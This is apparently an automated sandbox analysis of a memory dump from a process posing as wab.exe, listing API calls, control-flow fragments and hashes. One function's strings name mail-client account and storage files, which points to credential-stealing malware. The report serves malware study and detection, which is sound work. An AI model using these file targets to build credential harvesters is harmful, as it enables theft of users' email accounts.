                                    control_flow_graph 466 23dc3370-23dc33b5 call 23dc3330 call 23dc37a7 471 23dc3416-23dc3419 466->471 472 23dc33b7-23dc33c9 466->472 473 23dc3439-23dc3442 471->473 474 23dc341b-23dc3428 call 23dc3790 471->474 472->473 475 23dc33cb 472->475 478 23dc342d-23dc3436 call 23dc3330 474->478 477 23dc33d0-23dc33e7 475->477 479 23dc33fd 477->479 480 23dc33e9-23dc33f7 call 23dc3740 477->480 478->473 483 23dc3400-23dc3405 479->483 487 23dc340d-23dc3414 480->487 488 23dc33f9 480->488 483->477 486 23dc3407-23dc3409 483->486 486->473 489 23dc340b 486->489 487->478 490 23dc33fb 488->490 491 23dc3443-23dc344c 488->491 489->478 490->483 492 23dc344e-23dc3455 491->492 493 23dc3486-23dc3496 call 23dc3774 491->493 492->493 495 23dc3457-23dc3466 call 23dcbbe0 492->495 498 23dc3498-23dc34a7 call 23dc3790 493->498 499 23dc34aa-23dc34c6 call 23dc3330 call 23dc3758 493->499 503 23dc3468-23dc3480 495->503 504 23dc3483 495->504 498->499 503->504 504->493
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 23DC339B
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 23DC33A3
                                    • _ValidateLocalCookies.LIBCMT ref: 23DC3431
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 23DC345C
                                    • _ValidateLocalCookies.LIBCMT ref: 23DC34B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: ce5ecdb872362568e8b64571551b8fcbc29dcdf4c730ebd0bc5a5b6aafa68eab
                                    • Instruction ID: 287490519b917a8a4b30fdb4a1bf93d522b3beb763dd623eb084d554453ab8e5
                                    • Opcode Fuzzy Hash: ce5ecdb872362568e8b64571551b8fcbc29dcdf4c730ebd0bc5a5b6aafa68eab
                                    • Instruction Fuzzy Hash: 85412634E242889BCF11DF78C880ADEBBB5BF44224F0489DDD9149B291C73ADA05CFA4

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 23DC9221: _free.LIBCMT ref: 23DC924A
                                    • _free.LIBCMT ref: 23DC92AB
                                      • Part of subcall function 23DC571E: HeapFree.KERNEL32(00000000,00000000,?,23DC924F,?,00000000,?,00000000,?,23DC9276,?,00000007,?,?,23DC7E5A,?), ref: 23DC5734
                                      • Part of subcall function 23DC571E: GetLastError.KERNEL32(?,?,23DC924F,?,00000000,?,00000000,?,23DC9276,?,00000007,?,?,23DC7E5A,?,?), ref: 23DC5746
                                    • _free.LIBCMT ref: 23DC92B6
                                    • _free.LIBCMT ref: 23DC92C1
                                    • _free.LIBCMT ref: 23DC9315
                                    • _free.LIBCMT ref: 23DC9320
                                    • _free.LIBCMT ref: 23DC932B
                                    • _free.LIBCMT ref: 23DC9336
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                    • Instruction ID: 353151d107673e1fce22efea9bb8302146631fea630526901fa3528e79e1d396
                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                    • Instruction Fuzzy Hash: D1117F31560B88EAD671ABB0DC45FCBBBAEAF14710FC00C6CA6DD77092DA34B7448661
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,23DC6FFD,00000000,?,?,?,23DC8A72,?,?,00000100), ref: 23DC887B
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,23DC8A72,?,?,00000100,5EFC4D8B,?,?), ref: 23DC8901
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 23DC89FB
                                    • __freea.LIBCMT ref: 23DC8A08
                                      • Part of subcall function 23DC56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23DC5702
                                    • __freea.LIBCMT ref: 23DC8A11
                                    • __freea.LIBCMT ref: 23DC8A36
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                    • String ID:
                                    • API String ID: 1414292761-0
                                    • Opcode ID: a4e30d50770eda5b2f2d73fa1efd6605a5889af8c0b0c280b53ca7f3a8f5315d
                                    • Instruction ID: 186e3975be6d6ac1c231c434e848af74dceb0883a07ee73b4d7b4a3452b59b53
                                    • Opcode Fuzzy Hash: a4e30d50770eda5b2f2d73fa1efd6605a5889af8c0b0c280b53ca7f3a8f5315d
                                    • Instruction Fuzzy Hash: 5D510372670286AFEB259E64CC80EAB77AAFF50A50F150EADFD05D7140EB34DC50D6A0
                                    APIs
                                    • lstrcatW.KERNEL32(?,?), ref: 23DC1038
                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23DC104B
                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23DC1061
                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 23DC1075
                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 23DC1090
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 23DC10B8
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: lstrlen$AttributesFilelstrcat
                                    • String ID:
                                    • API String ID: 3594823470-0
                                    • Opcode ID: 9b0fdde12dd94ceae2079d30fe70ccda94ba861c0439dd48f22a97d1c3a51c91
                                    • Instruction ID: 63cd0ce6036f869d0aa0d36ca3607983fdd09a48db1714b73fe4373a037f2568
                                    • Opcode Fuzzy Hash: 9b0fdde12dd94ceae2079d30fe70ccda94ba861c0439dd48f22a97d1c3a51c91
                                    • Instruction Fuzzy Hash: 6121D3369103689BCF20EB65DC48EDF376CEF54214F104ADAE855931A1DE309A96CB50
                                    APIs
                                    • GetLastError.KERNEL32(?,?,23DC3518,23DC23F1,23DC1F17), ref: 23DC3864
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 23DC3872
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 23DC388B
                                    • SetLastError.KERNEL32(00000000,?,23DC3518,23DC23F1,23DC1F17), ref: 23DC38DD
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 8d57655f8464c58074ae7143da5933d56a01b79b905f378e4a3762ac978e2a38
                                    • Instruction ID: 6d636df608b3fc10b748aa2b08602ffda285c14d19b09335565c5c701e0706e4
                                    • Opcode Fuzzy Hash: 8d57655f8464c58074ae7143da5933d56a01b79b905f378e4a3762ac978e2a38
                                    • Instruction Fuzzy Hash: 7F014533638B825FE3113A79BC84E162A69EF21A317200BAEE010470D1EE2DC821425C
                                    APIs
                                    • GetLastError.KERNEL32(?,?,23DC6C6C), ref: 23DC5AFA
                                    • _free.LIBCMT ref: 23DC5B2D
                                    • _free.LIBCMT ref: 23DC5B55
                                    • SetLastError.KERNEL32(00000000,?,?,23DC6C6C), ref: 23DC5B62
                                    • SetLastError.KERNEL32(00000000,?,?,23DC6C6C), ref: 23DC5B6E
                                    • _abort.LIBCMT ref: 23DC5B74
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: d85d3fb3f911e877c52ba3b991f77a417cbea26bba2eb3cb62539710260c16d9
                                    • Instruction ID: 0772f764cad4cde3e49f0570a7f71876c78bb1bebbe57c3c36233f19162f8a4d
                                    • Opcode Fuzzy Hash: d85d3fb3f911e877c52ba3b991f77a417cbea26bba2eb3cb62539710260c16d9
                                    • Instruction Fuzzy Hash: 18F0F433534681ABC31736376C04F1B3E2F8BE1961B290DEDF91893181EE2484124134
                                    APIs
                                      • Part of subcall function 23DC1E89: lstrlenW.KERNEL32(?,?,?,?,?,23DC10DF,?,?,?,00000000), ref: 23DC1E9A
                                      • Part of subcall function 23DC1E89: lstrcatW.KERNEL32(?,?), ref: 23DC1EAC
                                      • Part of subcall function 23DC1E89: lstrlenW.KERNEL32(?,?,23DC10DF,?,?,?,00000000), ref: 23DC1EB3
                                      • Part of subcall function 23DC1E89: lstrlenW.KERNEL32(?,?,23DC10DF,?,?,?,00000000), ref: 23DC1EC8
                                      • Part of subcall function 23DC1E89: lstrcatW.KERNEL32(?,23DC10DF), ref: 23DC1ED3
                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 23DC122A
                                      • Part of subcall function 23DC173A: _strlen.LIBCMT ref: 23DC1855
                                      • Part of subcall function 23DC173A: _strlen.LIBCMT ref: 23DC1869
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                    • API String ID: 4036392271-1520055953
                                    • Opcode ID: b3e504b2e65f798e286991e54d06a309bc07302f5a14db977bed2877274d6f31
                                    • Instruction ID: cf9cf88014a9782d420a8421720a1b71dd230dcc14b5c7697025266731bb6074
                                    • Opcode Fuzzy Hash: b3e504b2e65f798e286991e54d06a309bc07302f5a14db977bed2877274d6f31
                                    • Instruction Fuzzy Hash: 9C21EB7AE203586AEB2097E4EC81FED7339EF50714F00098AF604EB1D1E6B11D868758
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,23DC4AEA,?,?,23DC4A8A,?,23DD2238,0000000C,23DC4BBD,00000000,00000000), ref: 23DC4B59
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 23DC4B6C
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,23DC4AEA,?,?,23DC4A8A,?,23DD2238,0000000C,23DC4BBD,00000000,00000000,00000001,23DC2082), ref: 23DC4B8F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 7ad6f1a4c4490fc5f5c350f141b285589a5431c36c5fc39f5f14e0c908578895
                                    • Instruction ID: e4d5a00fc1d5fd65514a26e80698480df7bf71410b051052f01401c1b204420d
                                    • Opcode Fuzzy Hash: 7ad6f1a4c4490fc5f5c350f141b285589a5431c36c5fc39f5f14e0c908578895
                                    • Instruction Fuzzy Hash: 06F0A432A20109BFCB12AFA4CC08F9DBFBAEF14751F1005ADE905E3140DB349955DA54
                                    APIs
                                    • _strlen.LIBCMT ref: 23DC1607
                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,23DC190E,?,?,00000000,?,00000000), ref: 23DC1643
                                    • lstrcatW.KERNEL32(?,?), ref: 23DC165A
                                    • lstrlenW.KERNEL32(?,?,?,?,?,23DC190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 23DC1661
                                    • lstrcatW.KERNEL32(00001008,?), ref: 23DC1686
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: lstrcatlstrlen$_strlen
                                    • String ID:
                                    • API String ID: 3802368996-0
                                    • Opcode ID: bed894d4e9ab0ff9acacf890af83c3e8ceabdca1e4d1a4411eb50ff1e636e5fe
                                    • Instruction ID: cc9aa79fe0c52bbeaaad1bd56235a1f83bf65f34045f99b423ef02aa0e515d7c
                                    • Opcode Fuzzy Hash: bed894d4e9ab0ff9acacf890af83c3e8ceabdca1e4d1a4411eb50ff1e636e5fe
                                    • Instruction Fuzzy Hash: F321D332A10344ABCB119B68DC81EEE77B8EF98710F24485FE504AB181DF74A94287B9
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 23DC715C
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 23DC717F
                                      • Part of subcall function 23DC56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23DC5702
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 23DC71A5
                                    • _free.LIBCMT ref: 23DC71B8
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 23DC71C7
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: 7a9d1649efe80b6c7ccdafd2c07183cd74b82c3c1f61d5ac006d7900a744223d
                                    • Instruction ID: 46f6b1c0505cae12677da7cc8431e9ceeef3da2bb062954888186079feceb313
                                    • Opcode Fuzzy Hash: 7a9d1649efe80b6c7ccdafd2c07183cd74b82c3c1f61d5ac006d7900a744223d
                                    • Instruction Fuzzy Hash: 9B01DB73632295BFA7112ABB4C8CD7B6A6DDFD2DA031409AEFD04C7200EE648C0691F4
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000000,23DC636D,23DC5713,00000000,?,23DC2249,?,?,23DC1D66,00000000,?,?,00000000), ref: 23DC5B7F
                                    • _free.LIBCMT ref: 23DC5BB4
                                    • _free.LIBCMT ref: 23DC5BDB
                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23DC5BE8
                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23DC5BF1
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: 10ed299877355e3faea24bdf380b481882240cba9b01ca86946fba4fd85dc2ea
                                    • Instruction ID: c51836d1a6bf2a3bd73ad4894b59993cb3d426dfa0bc91bd0daed58fd8f88b20
                                    • Opcode Fuzzy Hash: 10ed299877355e3faea24bdf380b481882240cba9b01ca86946fba4fd85dc2ea
                                    • Instruction Fuzzy Hash: A101D17B134782ABC213363B5C84F1B2E6F9BE29707190DEDF81593182EE68D9124574
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,?,?,23DC10DF,?,?,?,00000000), ref: 23DC1E9A
                                    • lstrcatW.KERNEL32(?,?), ref: 23DC1EAC
                                    • lstrlenW.KERNEL32(?,?,23DC10DF,?,?,?,00000000), ref: 23DC1EB3
                                    • lstrlenW.KERNEL32(?,?,23DC10DF,?,?,?,00000000), ref: 23DC1EC8
                                    • lstrcatW.KERNEL32(?,23DC10DF), ref: 23DC1ED3
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 493641738-0
                                    • Opcode ID: 4a014680693d7f4495f37a19393e31e3fdab1dd911ca04ba40aeebe546b0fc69
                                    • Instruction ID: b8214876fbdf452910f44f2cfbbcfbfba229f0f40950412fe0c172576bacd9e5
                                    • Opcode Fuzzy Hash: 4a014680693d7f4495f37a19393e31e3fdab1dd911ca04ba40aeebe546b0fc69
                                    • Instruction Fuzzy Hash: 01F089271102107AD7213719AC85E7F777CEFD6A60B04041EF608831909B55685292B5
                                    APIs
                                    • _free.LIBCMT ref: 23DC91D0
                                      • Part of subcall function 23DC571E: HeapFree.KERNEL32(00000000,00000000,?,23DC924F,?,00000000,?,00000000,?,23DC9276,?,00000007,?,?,23DC7E5A,?), ref: 23DC5734
                                      • Part of subcall function 23DC571E: GetLastError.KERNEL32(?,?,23DC924F,?,00000000,?,00000000,?,23DC9276,?,00000007,?,?,23DC7E5A,?,?), ref: 23DC5746
                                    • _free.LIBCMT ref: 23DC91E2
                                    • _free.LIBCMT ref: 23DC91F4
                                    • _free.LIBCMT ref: 23DC9206
                                    • _free.LIBCMT ref: 23DC9218
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 7a476540b0264f37f2b9689f55880cb4c4caae75cd210bc7702a616da3393fb8
                                    • Instruction ID: e6bcf88040546690f877af45767d8cd02763c32800c9cd13d3b7c12678877f79
                                    • Opcode Fuzzy Hash: 7a476540b0264f37f2b9689f55880cb4c4caae75cd210bc7702a616da3393fb8
                                    • Instruction Fuzzy Hash: 05F04F735246C4A7C624EB59D5C5E067BFAEB20A107640C8DF949D7540CA34F8908A64
                                    APIs
                                    • _free.LIBCMT ref: 23DC536F
                                      • Part of subcall function 23DC571E: HeapFree.KERNEL32(00000000,00000000,?,23DC924F,?,00000000,?,00000000,?,23DC9276,?,00000007,?,?,23DC7E5A,?), ref: 23DC5734
                                      • Part of subcall function 23DC571E: GetLastError.KERNEL32(?,?,23DC924F,?,00000000,?,00000000,?,23DC9276,?,00000007,?,?,23DC7E5A,?,?), ref: 23DC5746
                                    • _free.LIBCMT ref: 23DC5381
                                    • _free.LIBCMT ref: 23DC5394
                                    • _free.LIBCMT ref: 23DC53A5
                                    • _free.LIBCMT ref: 23DC53B6
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5adaf84f6a3e2df65ca1748dbe56465b1472815deeb2ee1a5889436a03ff38c5
                                    • Instruction ID: fb1133676c9507b7fb5aa938a9ed4dcddf177baf34ea7c8cc81c1f7ac16f8ed9
                                    • Opcode Fuzzy Hash: 5adaf84f6a3e2df65ca1748dbe56465b1472815deeb2ee1a5889436a03ff38c5
                                    • Instruction Fuzzy Hash: 3CF054B3D2426CDBC7167F3695804093BB2F735B503050A8EF81497294DF39A5618F90
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 23DC4C1D
                                    • _free.LIBCMT ref: 23DC4CE8
                                    • _free.LIBCMT ref: 23DC4CF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                    • API String ID: 2506810119-3377118234
                                    • Opcode ID: 8a4c56ec5a03c88c6e2ff998e30ddb72fe05914642d605c8874d871db037ff17
                                    • Instruction ID: f88128d416ad38f5b00a352f72b9ec11c08b01117ec1c0af58ad0651b1379421
                                    • Opcode Fuzzy Hash: 8a4c56ec5a03c88c6e2ff998e30ddb72fe05914642d605c8874d871db037ff17
                                    • Instruction Fuzzy Hash: A2316372B1039CAFDB22DBA98980D9EBBFCEB95710B1444DEF90497210D6749E41CB60
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,23DC6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 23DC8731
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 23DC87BA
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 23DC87CC
                                    • __freea.LIBCMT ref: 23DC87D5
                                      • Part of subcall function 23DC56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23DC5702
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                    • String ID:
                                    • API String ID: 2652629310-0
                                    • Opcode ID: 4a814f8dd6948dbc20cb9389ddc6478ebfcc178ab80613f3684ad406dc835f05
                                    • Instruction ID: d66d49c401273b645e6c0efd26c58948552f9d80d600e6353f5c11bd10b75ba4
                                    • Opcode Fuzzy Hash: 4a814f8dd6948dbc20cb9389ddc6478ebfcc178ab80613f3684ad406dc835f05
                                    • Instruction Fuzzy Hash: D031C132A2025AABDF259F64CC80EAF7BA5EF50710F0509ADED04D7190E735D965CBA0
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,23DC1D66,00000000,00000000,?,23DC5C88,23DC1D66,00000000,00000000,00000000,?,23DC5E85,00000006,FlsSetValue), ref: 23DC5D13
                                    • GetLastError.KERNEL32(?,23DC5C88,23DC1D66,00000000,00000000,00000000,?,23DC5E85,00000006,FlsSetValue,23DCE190,FlsSetValue,00000000,00000364,?,23DC5BC8), ref: 23DC5D1F
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,23DC5C88,23DC1D66,00000000,00000000,00000000,?,23DC5E85,00000006,FlsSetValue,23DCE190,FlsSetValue,00000000), ref: 23DC5D2D
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 0ec5017391634476c26cadfb085087cf8817702c47449297250cb41f1264080f
                                    • Instruction ID: 3a3a043a27d56330e595153269696b45e47c1467ad6b0740f3b7cdd17ed0def7
                                    • Opcode Fuzzy Hash: 0ec5017391634476c26cadfb085087cf8817702c47449297250cb41f1264080f
                                    • Instruction Fuzzy Hash: 7501F237631363ABC3116A6A8C5CE86779EAF45AA1B240E69FA0AD7140D734D811CAE0
                                    APIs
                                    • _free.LIBCMT ref: 23DC655C
                                      • Part of subcall function 23DC62BC: IsProcessorFeaturePresent.KERNEL32(00000017,23DC62AB,00000000,?,?,?,?,00000016,?,?,23DC62B8,00000000,00000000,00000000,00000000,00000000), ref: 23DC62BE
                                      • Part of subcall function 23DC62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 23DC62E0
                                      • Part of subcall function 23DC62BC: TerminateProcess.KERNEL32(00000000), ref: 23DC62E7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
